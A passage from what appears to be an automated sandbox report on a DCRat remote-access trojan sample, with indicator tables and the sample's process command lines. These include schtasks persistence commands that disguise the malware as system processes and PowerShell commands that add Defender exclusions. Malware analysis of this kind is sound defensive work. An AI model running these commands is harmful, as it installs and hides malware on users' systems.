| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\sk-SK\RCXA564.tmp | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| File opened for modification | C:\Windows\System32\sk-SK\RCXA565.tmp | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| File opened for modification | C:\Windows\System32\sk-SK\StartMenuExperienceHost.exe | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| File created | C:\Windows\System32\sk-SK\StartMenuExperienceHost.exe | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| File created | C:\Windows\System32\sk-SK\55b276f4edf653 | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Speech\Engines\Lexicon\9e8d7a4ca61bd9 | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| File opened for modification | C:\Windows\Speech\Engines\Lexicon\RCXAEE2.tmp | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| File opened for modification | C:\Windows\Speech\Engines\Lexicon\RCXAEE3.tmp | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| File opened for modification | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| File created | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe
"C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\smss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\Default User\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf1" /sc MINUTE /mo 5 /tr "'C:\Program Files\edge_BITS_4680_1850129863\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf" /sc ONLOGON /tr "'C:\Program Files\edge_BITS_4680_1850129863\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf1" /sc MINUTE /mo 8 /tr "'C:\Program Files\edge_BITS_4680_1850129863\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\d25f591a00514bc9ba8441\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\d25f591a00514bc9ba8441\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\d25f591a00514bc9ba8441\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Pictures\Idle.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Public\Pictures\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Pictures\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Windows\System32\sk-SK\StartMenuExperienceHost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\System32\sk-SK\StartMenuExperienceHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Windows\System32\sk-SK\StartMenuExperienceHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files\edge_BITS_4732_595216890\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\edge_BITS_4732_595216890\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Program Files\edge_BITS_4732_595216890\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\7e20f84d5244aba7145631d4073af8\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\7e20f84d5244aba7145631d4073af8\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\7e20f84d5244aba7145631d4073af8\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\7e20f84d5244aba7145631d4073af8\lsass.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\7e20f84d5244aba7145631d4073af8\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\7e20f84d5244aba7145631d4073af8\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Roaming\Sun\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\Sun\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\AppData\Roaming\Sun\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Program Files\edge_BITS_4732_595216890\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\edge_BITS_4732_595216890\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Program Files\edge_BITS_4732_595216890\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\d25f591a00514bc9ba8441\sihost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\d25f591a00514bc9ba8441\sihost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 9 /tr "'C:\d25f591a00514bc9ba8441\sihost.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\smss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\edge_BITS_4680_1850129863\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Multimedia Platform\services.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\d25f591a00514bc9ba8441\RuntimeBroker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Pictures\Idle.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\sk-SK\StartMenuExperienceHost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\edge_BITS_4732_595216890\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\7e20f84d5244aba7145631d4073af8\RuntimeBroker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\7e20f84d5244aba7145631d4073af8\lsass.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Sun\RuntimeBroker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\edge_BITS_4732_595216890\services.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\RuntimeBroker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\d25f591a00514bc9ba8441\sihost.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XeGdH0U8sJ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
"C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c0c5fc13-d501-4833-9b9b-2f080c1c8aaa.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5a79a36d-291c-4c41-a4e1-ce73bfd5be23.vbs"
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\239e4973-5b62-442b-9de7-006ed6a8a33a.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\29977282-8079-4515-abe5-95d953d4d2e7.vbs"
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\86e9093d-cfd8-4f3c-89b1-c4cc91329d80.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5a0d340d-5da3-465a-b7c6-c63eca7fb974.vbs"
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3ba6a0cf-f68f-41a4-9e7a-e7243952869a.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7c72cc37-3e9c-428a-9a57-6cf126c94b89.vbs"
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3ec648c8-1a84-4dd5-ad79-9f0512d16478.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\51408b74-5209-4e9d-b34f-994d528be8c5.vbs"
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a4c3d2b5-daef-4164-abe0-b84a7d8560d3.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\02724ef0-5704-4728-b259-f0ec34b3f4cb.vbs"
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\821b7e38-7e51-4bcc-a17e-12564ee68448.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6cf45963-e3ec-464e-b072-bde9404bf4cd.vbs"
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aba768da-aa2e-42b0-ba71-4d52689d6e04.vbs"
C:\Windows\System32\WScript.exe
